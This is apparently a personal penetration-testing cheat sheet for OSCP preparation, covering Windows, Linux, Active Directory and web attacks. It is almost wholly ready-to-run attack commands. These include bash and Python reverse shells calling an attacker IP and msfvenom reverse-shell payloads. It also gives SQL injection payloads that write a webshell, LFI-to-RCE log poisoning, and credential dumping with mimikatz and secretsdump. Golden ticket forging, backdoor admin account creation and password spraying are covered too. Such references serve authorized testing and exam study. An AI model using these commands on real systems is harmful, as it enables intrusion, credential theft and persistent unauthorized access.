My personal reference built from real VAPT engagements and OSCP+ exam prep. Windows, Linux, Active Directory, Web — everything in one place. Last updated: 2026.
cd c:\Users tree /F
# Advanced full enumeration nmap -A [IP] -oN machine.txt # Fast all-ports (SYN + UDP) sudo nmap -p- -sS -sU --min-rate=1000 --max-retries=1 -T4 [IP] # Fast TCP only — skips host discovery nmap -p- -T4 -n -Pn [IP] -oN ports.txt # All ports greppable output sudo nmap --min-rate 5000 -p- -vvv -Pn -n -oG openPorts.txt [IP] # Service version scan on found ports nmap -sC -sV -p 22,80,445 [IP] -v # Run vuln scripts sudo nmap -sV -p 443 --script "vuln" [IP] # Use -Pn if getting nothing nmap -sC -sV [IP] -Pn
| Purpose | Command |
|---|---|
| UDP Scan | sudo nmap -sU -sS [IP] |
| OS Detection | nmap -O [IP] |
| Service Versions | nmap -sV [IP] |
| Top 20 ports | nmap --top-ports=20 [IP] |
| Network sweep | nmap -sn 192.168.1.0/24 |
ftp [IP] ftp anonymous@[IP] # Try anonymous login ftp -A anonymous@[IP] # Passive mode get [file] # Download put [file] # Upload hydra -L users.txt -P pass.txt [IP] ftp # Bruteforce
ssh user@IP ssh anonymous@IP chmod 600 id_rsa && ssh user@IP -i id_rsa # Crack id_rsa / id_ecdsa ssh2john id_rsa > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash # Bruteforce hydra -l user -P passwords.txt [IP] ssh # Add SSH public key for persistence ssh-keygen -t rsa -b 4096 chmod 700 ~/.ssh nano ~/.ssh/authorized_keys # paste id_rsa.pub content chmod 600 ~/.ssh/authorized_keys
# Enumerate sudo nbtscan -r 192.168.50.0/24 smbclient -L //IP smbmap -H [IP] smbmap -H [IP] -u user -p pass # Connect to share smbclient //server/share smbclient //server/share -U user smbclient \\\\192.168.1.1\\share # Download entire share at once mask "" recurse ON prompt OFF mget * # CrackMapExec crackmapexec smb [IP] -u user -p pass --shares crackmapexec smb [IP] -u user -p pass --users crackmapexec smb [IP] -u user -p pass --sam
host www.target.com
host -t mx target.com
host -t txt target.com
dnsrecon -d target.com -t std
dnsrecon -d target.com -D ~/list.txt -t brt
dnsenum target.com
# Subdomain fuzzing with ffuf
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt \
-H "Host: FUZZ.target.com" -u http://[IP] -fs [size]
# Unauthenticated ldapsearch -x -H ldap://[IP]:[port] # Authenticated ldapsearch -x -H ldap://[IP] -D 'DOMAIN\user' -w 'pass' \ -b "DC=domain,DC=local" # windapsearch python3 windapsearch.py --dc-ip [IP] -u user -p pass --computers python3 windapsearch.py --dc-ip [IP] -u user -p pass --users python3 windapsearch.py --dc-ip [IP] -u user -p pass --privileged-users
snmpwalk -c public -v1 [IP] snmpwalk -c public -v1 [IP] 1.3.6.1.4.1.77.1.2.25 # Windows users snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.4.2.1.2 # Running processes snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.6.3.1.2 # Installed software snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpcheck -t [IP] -c public
rpcclient -U="" [IP] # Anonymous rpcclient -U=user [IP] # Inside rpcclient enumdomusers # List users enumdomgroups # List groups querydispinfo # User descriptions queryuser [user] # Detailed user info netshareenumall # All shares
Check /robots.txt, view the page source, and look for hostnames to add to /etc/hosts. Use Wappalyzer to fingerprint the CMS.
gobuster dir -u http://target.com -w /path/to/wordlist.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/big.txt -x php,txt,html
python3 dirsearch.py -u http://target.com
nikto -h http://target.com
# API endpoint fuzzing
gobuster dir -u http://[IP]:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
# Basic traversal http://target.com/index.php?page=../../../../../etc/passwd # URL encoded curl http://[IP]/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd # LFI with log poisoning → RCE http://target.com/index.php?page=../../../var/log/apache2/access.log&cmd=whoami # PHP wrappers curl "http://target.com/index.php?page=data://text/plain," curl http://target.com/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/config.php # Windows traversal http://[IP]:3000/public/plugins/alertlist/../../../Users/install.txt
admin' or '1'='1
' or '1'='1' --
" or "1"="1"--
") or ("1"="1"--
# Time-based blind SQLi
' AND IF(1=1, sleep(3),'false') -- //
# MSSQL RCE via xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
# Write webshell via UNION
' UNION SELECT "",null,null INTO OUTFILE "/var/www/html/shell.php" -- //
sqlmap -u http://[IP]/page.php?user=1 -p user sqlmap -u http://[IP]/page.php?user=1 -p user --dump sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
wpscan --url "http://target" --enumerate vp,u,vt,tt --verbose wpscan --url http://target --api-token [YOUR_TOKEN]
hydra -l user -P rockyou.txt [IP] ssh hydra -l ajla -P /home/kali/rockyou.txt -T 20 sandbox.local ssh hydra -L users.txt -P pass.txt [IP] http-post-form \ "/login:user=^USER^&pass=^PASS^:Login failed" -V
searchsploit [service name]
searchsploit -m windows/remote/46697.py # Copy to current dir
# Windows EXE msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > shell.exe # PHP msfvenom -p php/reverse_php LHOST=[IP] LPORT=[PORT] -f raw > shell.php # ASP / JSP / WAR msfvenom -p windows/shell/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > shell.war # DLL for hijacking msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll > file.dll # MSI (AlwaysInstallElevated) msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] --platform windows -f msi > reverse.msi
# Bash bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 # Python python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' # PHP & /dev/tcp/10.0.0.1/4242 0>&1');?> # Shell upgrade after catching python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'
# Linux download wget http://[LHOST]/file curl http://[LHOST]/file -o output # Windows download (PowerShell) iwr -uri http://[LHOST]/file -Outfile file.exe certutil -urlcache -split -f "http://[LHOST]/file" file.exe powershell -command "Invoke-WebRequest -Uri http://[LHOST]/file -Outfile C:\temp\file" # SMB share (Kali → Windows) kali> impacket-smbserver -smb2support share . win> copy file \\[KaliIP]\share # SCP scp nmap pivot@10.1.1.10:/tmp # Netcat nc [target] 1234 < file # Attacker sends nc -lvp 1234 > file # Target receives # Unzip tar files in Kali tar -xvf file.tar tar -xzvf file.tar.gz tar -xjvf file.tar.bz2 tar -xJvf file.tar.xz tar -xvf file.tar -C /destination/
Run winpeas.exe first. Then whoami /all. Check PowerShell history: (Get-PSReadlineOption).HistorySavePath
whoami /groups whoami /all whoami /priv # Running services Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} # PowerShell history Get-History type C:\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt # Installed software Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname # Interesting files Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue # Find OSCP flag cd C:\ & findstr /SI /M "OS{" *.xml *.ini *.txt
winpeas.exe winpeas.bat Jaws-enum.ps1 powerup.ps1 PrivescCheck.ps1
# PrintSpoofer PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -c "nc.exe [LHOST] [LPORT] -e cmd" # GodPotato GodPotato.exe -cmd "cmd /c whoami" GodPotato.exe -cmd "shell.exe" # JuicyPotatoNG JuicyPotatoNG.exe -t * -p "shell.exe" -a # RoguePotato RoguePotato.exe -r [AttackerIP] -e "shell.exe" -l 9999
# Find unquoted service paths wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ # Check permissions (F = Full Access) icacls "C:\path\to\service" # Change binary path sc config [service] binpath="C:\temp\shell.exe" sc start [service] # Weak registry permissions reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f net start [service]
# Check (should return 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] --platform windows -f msi > reverse.msi
msiexec /quiet /qn /i reverse.msi
# Check these paths C:\Windows\repair\SAM C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\SAM # Extract hashes impacket-secretsdump -system SYSTEM -sam SAM local
| Path | What to find |
|---|---|
| C:\Windows\Panther\Unattended.xml | Plaintext admin creds (auto-install) |
| C:\Windows\repair\SAM | Password hash backup |
| C:\Windows\System32\config\regback\* | Registry hive backups |
| C:\Program Files\FileZilla Server\FileZilla Server.xml | Plaintext FTP creds |
| C:\xampp\apache\bin\php.ini | Credentials, upload settings |
| C:\inetpub\wwwroot\global.asa | DB connection strings |
| C:\Windows\debug\NetSetup.log | Domain join credentials |
| C:\Windows\System32\drivers\etc\hosts | Custom DNS redirects |
# Save as OSCP-Windows-Enum.ps1 Set-ExecutionPolicy Bypass -Scope Process -Force .\OSCP-Windows-Enum.ps1 # Search for credential keywords in files $patterns = @("password","user","admin","token","apikey","secret", "[a-fA-F0-9]{32}","[a-fA-F0-9]{40}","[A-Za-z0-9+/=]{20,}") findstr /si password *.txt *.xml *.ini *.config findstr /spin "password" *.* # Registry credential search reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # KeePass files Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue keepass2john Database.kdbx > keepasshash john --wordlist=rockyou.txt keepasshash
net user hacker hacker123 /add net localgroup Administrators hacker /add net localgroup "Remote Desktop Users" hacker /ADD
xfreerdp /u:user /p:'pass' /v:IP
xfreerdp /d:domain.com /u:user /p:'pass' /v:IP
xfreerdp /u:user /p:'pass' /v:IP +clipboard
xfreerdp3 /v:IP /u:user /d:domain /p:'pass' /cert:ignore /multimon \ # /multimon = bigger screen
sudo -l find / -perm -u=s -type f 2>/dev/null # SUID binaries getcap -r / 2>/dev/null # Capabilities find / -writable -type d 2>/dev/null # Writable dirs cat /etc/crontab && crontab -l # Cron jobs cat /etc/fstab # Mounted drives cat .bashrc && env # Env variables / history # Live process credential harvesting watch -n 1 "ps -aux | grep pass" sudo tcpdump -i lo -A | grep "pass"
./linpeas.sh ./LinEnum.sh python3 linuxprivchecker.py
cat /etc/exports # On target — look for no_root_squash showmount -e [targetIP] # On attacker mount -o rw [targetIP]:/share /mnt/share # Copy binary, chmod +x, execute as root
Import-Module .\PowerView.ps1 Get-NetDomain Get-NetUser | select cn Get-NetGroup Get-NetComputer Find-LocalAdminAccess Get-NetSession -ComputerName [target] -Verbose Find-DomainShare # Kerberoastable accounts Get-NetUser -SPN | select samaccountname,serviceprincipalname # AS-REP Roastable Get-DomainUser -PreauthNotRequired -verbose # Check GenericAll rights Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Convert-SidToName [SID]
# SharpHound (on Windows target) Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp -OutputPrefix "audit" # bloodhound-python (from Kali) bloodhound-python -u 'user' -p 'pass' -ns [DC-IP] -d domain.local -c all # Start BloodHound sudo neo4j console # Upload the .json files in the BloodHound UI
# From Kali impacket-GetUserSPNs -dc-ip [DC-IP] domain/user:pass -request # From Windows .\Rubeus.exe kerberoast /outfile:hashes.kerberoast # Crack hashcat -m 13100 hashes.txt rockyou.txt --force
impacket-GetNPUsers -dc-ip [DC-IP] domain/user:pass -request .\Rubeus.exe asreproast /nowrap hashcat -m 18200 hashes.txt rockyou.txt --force
crackmapexec smb [IP/subnet] -u users.txt -p 'Password123' -d domain --continue-on-success
kerbrute passwordspray -d corp.com .\usernames.txt "Password123"
# Default passwords to always try
password / password1 / Password1 / Password@123
admin / administrator / admin@123
secretsdump.py domain/user:pass@IP
secretsdump.py user@IP -hashes lm:ntlm
secretsdump.py domain/user:pass@IP -just-dc-ntlm # Dump NTDS.dit
# Step 1: Get krbtgt hash lsadump::lsa /patch lsadump::dcsync /user:krbtgt # Step 2: Get domain SID whoami /user # Remove last part (RID) = domain SID # Step 3: Forge golden ticket kerberos::golden /user:admin /domain:corp.com /sid:[SID] /krbtgt:[HASH] /ticket:golden # Step 4: Use it kerberos::ptt golden misc::cmd
# Pass credentials or hashes — always use full hash psexec.py domain/user:pass@IP psexec.py -hashes aad3b435b51404ee:5fbc3d5fec8206a3 domain/user@IP wmiexec.py domain/user:pass@IP smbexec.py domain/user:pass@IP # winrs (Windows) winrs -r:[target] -u:user -p:pass "cmd" # Pass the ticket sekurlsa::tickets /export kerberos::ptt [ticket.kirbi] klist
privilege::debug token::elevate sekurlsa::logonpasswords # Hashes + plaintext passwords lsadump::sam lsadump::dcsync /user:krbtgt lsadump::lsa /patch # One-liner .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
impacket-smbclient domain/user:pass@IP impacket-lookupsid domain/user:pass@IP impacket-secretsdump domain/user:pass@IP impacket-GetUserSPNs domain/user:pass@IP -dc-ip [DC] -request # Kerberoasting impacket-GetNPUsers domain/ -dc-ip [DC] -usersfile users.txt -format hashcat # AS-REP impacket-psexec domain/user:pass@IP impacket-wmiexec domain/user:pass@IP impacket-mssqlclient user:pass@IP -windows-auth
nmap -p5985,5986 [IP] # 5985=plaintext, 5986=encrypted evil-winrm -i [IP] -u user -p pass evil-winrm -i [IP] -u user -H ntlmhash evil-winrm -i [IP] -u user -p pass -S # HTTPS (5986) # File operations upload file.exe download file C:\local\path # Load PowerShell scripts evil-winrm -i [IP] -u user -p pass -s /opt/privsc/powershell Bypass-4MSI Invoke-Mimikatz.ps1 Invoke-Mimikatz # Run binary evil-winrm -i [IP] -u user -p pass -e /opt/privsc Invoke-Binary /opt/privsc/winPEASx64.exe
# Setup on Kali sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -laddr 0.0.0.0:9001 -selfcert # On compromised machine agent.exe -connect [KaliIP]:9001 -ignore-cert # In Ligolo console session # Select host ifconfig # Note internal subnet start # Add route on Kali sudo ip r add [subnet] dev ligolo
# If .git found on target web server git log git show [commit-id] # Dump entire git repo # Use: https://github.com/arthaud/git-dumper # KDBX (KeePass) files find / -name *.kdbx 2>/dev/null # Linux Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue # Windows
ssh2john id_rsa > hash john hashfile --wordlist=rockyou.txt fcrackzip -u -D -p rockyou.txt file.zip zip2john file.zip > hash && john hash --wordlist=rockyou.txt
hashcat -m 1000 hash rockyou.txt --force # NTLM hashcat -m 13100 hash rockyou.txt --force # Kerberoast hashcat -m 18200 hash rockyou.txt --force # AS-REP # Hash modes: https://hashcat.net/wiki/doku.php?id=example_hashes
pth-winexe -U DOMAIN/admin%LM:NT //[IP] cmd.exe evil-winrm -i [IP] -u user -H [NTLM-HASH] crackmapexec smb [IP] -u user -H [FULL-HASH] --local-auth
ssh adminuser@[IP] -i id_rsa -D 9050 # SOCKS proxy via SSH # Edit /etc/proxychains4.conf — add socks5 127.0.0.1 9050 proxychains4 nmap [internal-IP] proxychains4 crackmapexec smb 10.10.10.0/24
It took years of real engagements to build these notes. A coffee keeps me adding more.